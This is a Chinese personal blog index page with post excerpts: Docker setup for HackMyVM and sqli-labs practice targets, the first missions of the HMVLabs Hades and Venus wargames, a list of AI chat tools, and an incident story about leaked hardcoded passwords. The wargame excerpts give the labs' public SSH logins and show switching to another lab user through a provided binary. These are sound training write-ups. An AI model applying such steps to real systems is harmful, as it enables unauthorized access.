                  <a href="/categories/%E9%9D%B6%E5%9C%BA/" itemprop="url" rel="index"><span itemprop="name">靶场</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
          <h1 id="启动"><a href="#启动" class="headerlink" title="启动"></a>启动</h1><p>看下 ReadMe.md，里面有几个要执行的命令：</p>
<ol>
<li>安装 Docker</li>
<li><code>docker build -t fr1end .</code> </li>
<li><code>docker run --name=fr1end -p1337:80 -p4000:4000 fr1end</code></li>
</ol>
<p>这样在宿主机的 1337 和 4000 端口就启动了，这里提醒下不要改端口，系统写死了访问路径，改了之后跑起来有问题。<br>其实我还习惯加一下 <code>--rm</code>（运行完自动清理容器）和 <code>-d</code>（后台运行，不用占着一个终端，不过要自己 stop），变成：<br><code>docker run --rm --name=fr1end -p1337:80 -p4000:4000 -d fr1end</code></p>
<p>除了自己折腾，题目也有.&#x2F;build_docker.sh 把刚才的命令打包了。直接执行也行。</p>
<p>玩好了也有对应的清理命令：</p>
<ol>
<li><code>docker rm fr1end -f</code> 删容器，如果加了 <code>--rm</code> 就不用执行这一步。</li>
<li><code>docker rmi fr1end</code> 删镜像</li>
</ol>
          <!--noindex-->
            <div class="post-button">
              <a class="btn" href="/2024/04/09/hmv-challenge-72/#more" rel="contents">
                阅读全文 &raquo;
              </a>
            </div>
          <!--/noindex-->
        
      
    </div>

    
    
    
      <footer class="post-footer">
        <div class="post-eof"></div>
      </footer>
  </article>
  
  
  

      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://ghostlitao.gitee.io/2024/02/20/sqli-lab-%E5%A4%8D%E7%9B%98/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="https://mp-b6a394ba-6e60-4cdf-941a-67c55476595e.cdn.bspapp.com/cloudstorage/43eb35ef-1aed-4d61-9ebb-a777fa49e70a.">
      <meta itemprop="name" content="Todd">
      <meta itemprop="description" content="把生命浪费在美好的实物上">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="去找Todd">
    </span>
      <header class="post-header">
        <h2 class="post-title" itemprop="name headline">
          
            <a href="/2024/02/20/sqli-lab-%E5%A4%8D%E7%9B%98/" class="post-title-link" itemprop="url">sqli-lab 复盘</a>
        </h2>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2024-02-20 12:20:05" itemprop="dateCreated datePublished" datetime="2024-02-20T12:20:05+08:00">2024-02-20</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2024-04-09 08:35:06" itemprop="dateModified" datetime="2024-04-09T08:35:06+08:00">2024-04-09</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
          <h1 id="0x00-Docker-中安装"><a href="#0x00-Docker-中安装" class="headerlink" title="0x00 Docker 中安装"></a>0x00 Docker 中安装</h1><p>在 Mac 上，推荐使用 OrbStack，速度更快。<br>检查 docker 命令：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">docker -v</span><br></pre></td></tr></table></figure>

<p>搜索 sqli-lab 镜像, 选择一个合适的镜像后下载。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">docker search sqli-lab</span><br><span class="line">docker pull c0ny1/sqli-labs</span><br></pre></td></tr></table></figure>

<p>注意这个仓库没有默认的 <code>:latest</code> 标签，所以需要指定版本号。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">docker pull c0ny1/sqli-labs:0.1</span><br></pre></td></tr></table></figure>
          <!--noindex-->
            <div class="post-button">
              <a class="btn" href="/2024/02/20/sqli-lab-%E5%A4%8D%E7%9B%98/#more" rel="contents">
                阅读全文 &raquo;
              </a>
            </div>
          <!--/noindex-->
        
      
    </div>

    
    
    
      <footer class="post-footer">
        <div class="post-eof"></div>
      </footer>
  </article>
  
  
  

      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://ghostlitao.gitee.io/2024/02/08/hmv-HMVLabs-Chapter-2-Hades/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="https://mp-b6a394ba-6e60-4cdf-941a-67c55476595e.cdn.bspapp.com/cloudstorage/43eb35ef-1aed-4d61-9ebb-a777fa49e70a.">
      <meta itemprop="name" content="Todd">
      <meta itemprop="description" content="把生命浪费在美好的实物上">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="去找Todd">
    </span>
      <header class="post-header">
        <h2 class="post-title" itemprop="name headline">
          
            <a href="/2024/02/08/hmv-HMVLabs-Chapter-2-Hades/" class="post-title-link" itemprop="url">HMVLabs Chapter 2: Hades</a>
        </h2>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2024-02-08 13:36:59" itemprop="dateCreated datePublished" datetime="2024-02-08T13:36:59+08:00">2024-02-08</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2024-04-09 08:35:39" itemprop="dateModified" datetime="2024-04-09T08:35:39+08:00">2024-04-09</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E9%9D%B6%E5%9C%BA/" itemprop="url" rel="index"><span itemprop="name">靶场</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
          <h1 id="MISSION-0x01"><a href="#MISSION-0x01" class="headerlink" title="MISSION 0x01"></a>MISSION 0x01</h1><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Host: hades.hackmyvm.eu</span></span><br><span class="line"><span class="comment"># Port: 6666</span></span><br><span class="line"><span class="comment"># User: hacker</span></span><br><span class="line"><span class="comment"># Pass: begood!</span></span><br><span class="line"></span><br><span class="line">ssh hacker@hades.hackmyvm.eu -p 6666</span><br><span class="line"><span class="built_in">cat</span> readme.txt</span><br><span class="line"><span class="built_in">cat</span> mission.txt</span><br><span class="line"><span class="comment"># User acantha has left us a gift to obtain her powers.</span></span><br><span class="line"><span class="comment"># 找一下gift</span></span><br><span class="line">find / -name *gift* 2&gt;/dev/null</span><br><span class="line"><span class="comment"># 找到 /opt/gift_hacker</span></span><br><span class="line">file /opt/gift_hacker</span><br><span class="line"><span class="comment"># -bash: file: command not found</span></span><br><span class="line"><span class="comment"># 竟然没有file命令</span></span><br><span class="line"><span class="comment"># 试试strings</span></span><br><span class="line">strings /opt/gift_hacker</span><br><span class="line"><span class="comment"># 看起来是一个二进制文件，应该需要执行</span></span><br><span class="line"><span class="comment"># 执行之后竟然是一个shell</span></span><br><span class="line"><span class="comment"># bash: you: command not found</span></span><br><span class="line"><span class="comment"># acantha@hades:~$</span></span><br><span class="line"><span class="built_in">id</span></span><br><span class="line"><span class="comment"># uid=2043(acantha) gid=2001(hacker) groups=2001(hacker)</span></span><br><span class="line"><span class="comment"># 之前是 uid=2001(hacker) gid=2001(hacker) groups=2001(hacker)</span></span><br><span class="line"><span class="built_in">ls</span> -al /pwned/acantha</span><br><span class="line"><span class="comment"># 没权限，先逆向下刚才的  /opt/gift_hacker 文件</span></span><br><span class="line">scp -P 6666 hacker@hades.hackmyvm.eu:/opt/gift_hacker .</span><br><span class="line"></span><br></pre></td></tr></table></figure>
          <!--noindex-->
            <div class="post-button">
              <a class="btn" href="/2024/02/08/hmv-HMVLabs-Chapter-2-Hades/#more" rel="contents">
                阅读全文 &raquo;
              </a>
            </div>
          <!--/noindex-->
        
      
    </div>

    
    
    
      <footer class="post-footer">
        <div class="post-eof"></div>
      </footer>
  </article>
  
  
  

      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://ghostlitao.gitee.io/2024/02/07/hmv-%E5%A4%8D%E7%9B%98HMVLabs-Chapter-1-Venus/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="https://mp-b6a394ba-6e60-4cdf-941a-67c55476595e.cdn.bspapp.com/cloudstorage/43eb35ef-1aed-4d61-9ebb-a777fa49e70a.">
      <meta itemprop="name" content="Todd">
      <meta itemprop="description" content="把生命浪费在美好的实物上">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="去找Todd">
    </span>
      <header class="post-header">
        <h2 class="post-title" itemprop="name headline">
          
            <a href="/2024/02/07/hmv-%E5%A4%8D%E7%9B%98HMVLabs-Chapter-1-Venus/" class="post-title-link" itemprop="url">复盘HMVLabs Chapter 1: Venus</a>
        </h2>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2024-02-07 16:05:21" itemprop="dateCreated datePublished" datetime="2024-02-07T16:05:21+08:00">2024-02-07</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2024-04-09 08:35:24" itemprop="dateModified" datetime="2024-04-09T08:35:24+08:00">2024-04-09</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E9%9D%B6%E5%9C%BA/" itemprop="url" rel="index"><span itemprop="name">靶场</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
          <h1 id="MISSION-0x01"><a href="#MISSION-0x01" class="headerlink" title="MISSION 0x01"></a>MISSION 0x01</h1><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">Host: venus.hackmyvm.eu</span><br><span class="line">Port: 5000</span><br><span class="line">User: hacker</span><br><span class="line">Pass: havefun!</span><br></pre></td></tr></table></figure>

<p><code>ssh hacker@venus.hackmyvm.eu -p 5000</code> 登录后，进入 Mission 1：<br>还有一个 readme.txt 可以先看看。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cat</span>  mission.txt</span><br><span class="line"></span><br><span class="line"><span class="comment"># User sophia has saved her password in a hidden file in this folder. Find it and log in as sophia.</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>
          <!--noindex-->
            <div class="post-button">
              <a class="btn" href="/2024/02/07/hmv-%E5%A4%8D%E7%9B%98HMVLabs-Chapter-1-Venus/#more" rel="contents">
                阅读全文 &raquo;
              </a>
            </div>
          <!--/noindex-->
        
      
    </div>

    
    
    
      <footer class="post-footer">
        <div class="post-eof"></div>
      </footer>
  </article>
  
  
  

      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://ghostlitao.gitee.io/2024/02/04/hmv-%E5%A4%8D%E7%9B%98HackMyVM-challenges-docker-059/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="https://mp-b6a394ba-6e60-4cdf-941a-67c55476595e.cdn.bspapp.com/cloudstorage/43eb35ef-1aed-4d61-9ebb-a777fa49e70a.">
      <meta itemprop="name" content="Todd">
      <meta itemprop="description" content="把生命浪费在美好的实物上">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="去找Todd">
    </span>
      <header class="post-header">
        <h2 class="post-title" itemprop="name headline">
          
            <a href="/2024/02/04/hmv-%E5%A4%8D%E7%9B%98HackMyVM-challenges-docker-059/" class="post-title-link" itemprop="url">复盘HackMyVM challenges docker 059</a>
        </h2>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2024-02-04 13:16:13" itemprop="dateCreated datePublished" datetime="2024-02-04T13:16:13+08:00">2024-02-04</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2024-04-09 08:36:30" itemprop="dateModified" datetime="2024-04-09T08:36:30+08:00">2024-04-09</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E9%9D%B6%E5%9C%BA/" itemprop="url" rel="index"><span itemprop="name">靶场</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
          <p>题目就一句话： Instructions in README.md inside the file.<br>然后给了个下载链接，下载下来是一个压缩包，解压后是源码、Dockerfile、README.md等文件。</p>
<p>先看 README 中几个地方比较关键：</p>
<ol>
<li>这是一个开源的 Blog 系统，代码地址 <a target="_blank" rel="noopener" href="https://github.com/MegaTKC/AeroCMS">https://github.com/MegaTKC/AeroCMS</a></li>
<li>有个自动启动脚本：<code>./build_docker.sh</code>，里面其实就是：<ol>
<li><code>docker build -t h1ker .</code></li>
<li><code>docker run --name=h1ker -d -p 1337:80 h1ker</code></li>
</ol>
</li>
<li>最后如何清理。</li>
</ol>
<p>执行 <code>./build_docker.sh</code> 后，访问 <code>http://localhost:1337/</code> 就能看到一个博客系统了。</p>
          <!--noindex-->
            <div class="post-button">
              <a class="btn" href="/2024/02/04/hmv-%E5%A4%8D%E7%9B%98HackMyVM-challenges-docker-059/#more" rel="contents">
                阅读全文 &raquo;
              </a>
            </div>
          <!--/noindex-->
        
      
    </div>

    
    
    
      <footer class="post-footer">
        <div class="post-eof"></div>
      </footer>
  </article>
  
  
  

      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://ghostlitao.gitee.io/2023/06/02/%E6%95%B4%E7%90%86%E5%B7%A5%E4%BD%9C%E4%B8%AD%E5%8F%AF%E8%83%BD%E7%94%A8%E5%88%B0%E7%9A%84-ai-%E5%B7%A5%E5%85%B7/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="https://mp-b6a394ba-6e60-4cdf-941a-67c55476595e.cdn.bspapp.com/cloudstorage/43eb35ef-1aed-4d61-9ebb-a777fa49e70a.">
      <meta itemprop="name" content="Todd">
      <meta itemprop="description" content="把生命浪费在美好的实物上">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="去找Todd">
    </span>
      <header class="post-header">
        <h2 class="post-title" itemprop="name headline">
          
            <a href="/2023/06/02/%E6%95%B4%E7%90%86%E5%B7%A5%E4%BD%9C%E4%B8%AD%E5%8F%AF%E8%83%BD%E7%94%A8%E5%88%B0%E7%9A%84-ai-%E5%B7%A5%E5%85%B7/" class="post-title-link" itemprop="url">整理工作中可能用到的 ai 工具</a>
        </h2>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2023-06-02 16:54:11" itemprop="dateCreated datePublished" datetime="2023-06-02T16:54:11+08:00">2023-06-02</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2023-06-29 08:50:16" itemprop="dateModified" datetime="2023-06-29T08:50:16+08:00">2023-06-29</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
          <h1 id="大模型对话："><a href="#大模型对话：" class="headerlink" title="大模型对话："></a><strong>大模型对话：</strong></h1><p>国内可以的ChatGPT和类似工具：</p>
<h2 id="ChatGPT镜像："><a href="#ChatGPT镜像：" class="headerlink" title="ChatGPT镜像："></a><strong>ChatGPT镜像：</strong></h2><p><a target="_blank" rel="noopener" href="https://easeai.co/">easeai.co</a></p>
<p><a target="_blank" rel="noopener" href="https://chat3.jinshutuan.com/">AIchatOS</a></p>
<p><a target="_blank" rel="noopener" href="https://chat-shared1.zhile.io/shared.html">Shared Chat (zhile.io)</a> </p>
<p>国内无法使用的ChatGPT：</p>
<p><a target="_blank" rel="noopener" href="https://chat.forefront.ai/">Forefront Chat</a> 可以免费用GPT-4，高峰期会卡</p>
<p><a target="_blank" rel="noopener" href="https://poe.com/ChatGPT">POE</a> 包含 Sage、GPT-4（每日一次）、Claude等</p>
<p><a target="_blank" rel="noopener" href="https://www.bing.com/search?q=Bing+AI&showconv=1&FORM=hpcodx">Bing AI - 搜索</a> </p>
<h2 id="Bard"><a href="#Bard" class="headerlink" title="Bard:"></a><strong>Bard:</strong></h2><p><a target="_blank" rel="noopener" href="https://bard.google.com/?hl=en">Meet Bard (google.com)</a></p>
<h2 id="文心一言："><a href="#文心一言：" class="headerlink" title="文心一言："></a><strong>文心一言：</strong></h2><p><a target="_blank" rel="noopener" href="https://yiyan.baidu.com/">文心一言</a></p>
<h2 id="星火大模型："><a href="#星火大模型：" class="headerlink" title="星火大模型："></a><strong>星火大模型：</strong></h2><p><a target="_blank" rel="noopener" href="https://xinghuo.xfyun.cn/desk">讯飞星火认知大模型</a></p>
<h2 id="通义千问："><a href="#通义千问：" class="headerlink" title="通义千问："></a><strong>通义千问：</strong></h2><p><a target="_blank" rel="noopener" href="https://tongyi.aliyun.com/">通义千问</a></p>
<h2 id="vscode-插件"><a href="#vscode-插件" class="headerlink" title="vscode 插件:"></a><strong>vscode 插件:</strong></h2><p><a target="_blank" rel="noopener" href="https://marketplace.visualstudio.com/items?itemName=genieai.chatgpt-vscode">        ChatGPT - Genie AI - Visual Studio Marketplace    </a>  </p>
<p>国内可用,需要 API Key</p>
<h2 id="浏览器插件"><a href="#浏览器插件" class="headerlink" title="浏览器插件:"></a><strong>浏览器插件:</strong></h2><p><a target="_blank" rel="noopener" href="https://www.zipzap.ai/">ZipZap是一款由ChatGPT驱动的免费AI助理，可随时从您的浏览器角落唤起。</a>  </p>
          <!--noindex-->
            <div class="post-button">
              <a class="btn" href="/2023/06/02/%E6%95%B4%E7%90%86%E5%B7%A5%E4%BD%9C%E4%B8%AD%E5%8F%AF%E8%83%BD%E7%94%A8%E5%88%B0%E7%9A%84-ai-%E5%B7%A5%E5%85%B7/#more" rel="contents">
                阅读全文 &raquo;
              </a>
            </div>
          <!--/noindex-->
        
      
    </div>

    
    
    
      <footer class="post-footer">
        <div class="post-eof"></div>
      </footer>
  </article>
  
  
  

      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://ghostlitao.gitee.io/2023/05/12/%E8%BD%AF%E4%BB%B6%E5%85%AC%E5%8F%B8%E7%9A%84%E5%AE%89%E5%85%A8%E5%BB%BA%E8%AE%BE/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="https://mp-b6a394ba-6e60-4cdf-941a-67c55476595e.cdn.bspapp.com/cloudstorage/43eb35ef-1aed-4d61-9ebb-a777fa49e70a.">
      <meta itemprop="name" content="Todd">
      <meta itemprop="description" content="把生命浪费在美好的实物上">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="去找Todd">
    </span>
      <header class="post-header">
        <h2 class="post-title" itemprop="name headline">
          
            <a href="/2023/05/12/%E8%BD%AF%E4%BB%B6%E5%85%AC%E5%8F%B8%E7%9A%84%E5%AE%89%E5%85%A8%E5%BB%BA%E8%AE%BE/" class="post-title-link" itemprop="url">软件公司的安全建设</a>
        </h2>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2023-05-12 14:35:55" itemprop="dateCreated datePublished" datetime="2023-05-12T14:35:55+08:00">2023-05-12</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2024-04-09 08:34:53" itemprop="dateModified" datetime="2024-04-09T08:34:53+08:00">2024-04-09</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E7%9E%8E%E5%86%99/" itemprop="url" rel="index"><span itemprop="name">瞎写</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
          <p>最近公司同事做了件离谱的事，把给客户公司写的软件源代码放到GitHub上开源了。<br>要说光是软件源代码，这件事儿也不算太大，因为是他自己负责的一个小项目，本身也没太大的商业价值，只能说公司的项目随便就开源了，一个招呼都不打，安全意识不行吧。<br>最大的问题是，他把密码硬编码到了配置文件里，配置文件也一起上传了，客户最近几天正在做PT（渗透测试），一下窟窿就捅大了。</p>
<p>现在客户让我拿出来解决方案，以及保障后续不会出现类似情况。<br>我想了想，这件事儿的问题应该包括以下几个方面：</p>
          <!--noindex-->
            <div class="post-button">
              <a class="btn" href="/2023/05/12/%E8%BD%AF%E4%BB%B6%E5%85%AC%E5%8F%B8%E7%9A%84%E5%AE%89%E5%85%A8%E5%BB%BA%E8%AE%BE/#more" rel="contents">
                阅读全文 &raquo;
              </a>
            </div>
          <!--/noindex-->
        
      
    </div>

    
    
    
      <footer class="post-footer">
        <div class="post-eof"></div>
      </footer>
  </article>
  
  
  


  
  <nav class="pagination">
    <span class="page-number current">1</span><a class="page-number" href="/page/2/">2</a><span class="space">&hellip;</span><a class="page-number" href="/page/4/">4</a><a class="extend next" rel="next" href="/page/2/" aria-label="下一页"><i class="fa fa-angle-right" aria-hidden="true"></i></a>
  </nav>



          </div>
          

<script>
  // Comment-tab persistence for the NexT theme's "tabs" integration.
  // Reads CONFIG.comments (provided by the theme's configuration script)
  // and, when CONFIG.comments.storage is truthy, keeps the last selected
  // comment tab in localStorage under the key 'comments_active'.

  // On 'tabs:register': pick the tab to activate (stored choice first when
  // storage is enabled, otherwise CONFIG.comments.activeClass) and click
  // its anchor if it exists in the DOM.
  function restoreActiveCommentTab() {
    const useStorage = CONFIG.comments.storage;
    const stored = useStorage ? localStorage.getItem('comments_active') : null;
    const activeClass = stored || CONFIG.comments.activeClass;
    if (!activeClass) return;
    const selector = 'a[href="#comment-' + activeClass + '"]';
    const activeTab = document.querySelector(selector);
    if (activeTab !== null) {
      activeTab.click();
    }
  }

  // On 'tabs:click': remember the clicked comment pane. Only panes inside
  // .tabs-comment are considered; the pane's second class name is stored.
  function rememberClickedCommentTab(event) {
    const pane = event.target;
    if (!pane.matches('.tabs-comment .tab-content .tab-pane')) return;
    localStorage.setItem('comments_active', pane.classList[1]);
  }

  window.addEventListener('tabs:register', restoreActiveCommentTab);
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', rememberClickedCommentTab);
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Todd"
      src="https://mp-b6a394ba-6e60-4cdf-941a-67c55476595e.cdn.bspapp.com/cloudstorage/43eb35ef-1aed-4d61-9ebb-a777fa49e70a.">
  <p class="site-author-name" itemprop="name">Todd</p>
  <div class="site-description" itemprop="description">把生命浪费在美好的实物上</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">34</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">7</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/ghostlitao" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;ghostlitao" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 2019 – 
  <span itemprop="copyrightYear">2024</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Todd</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
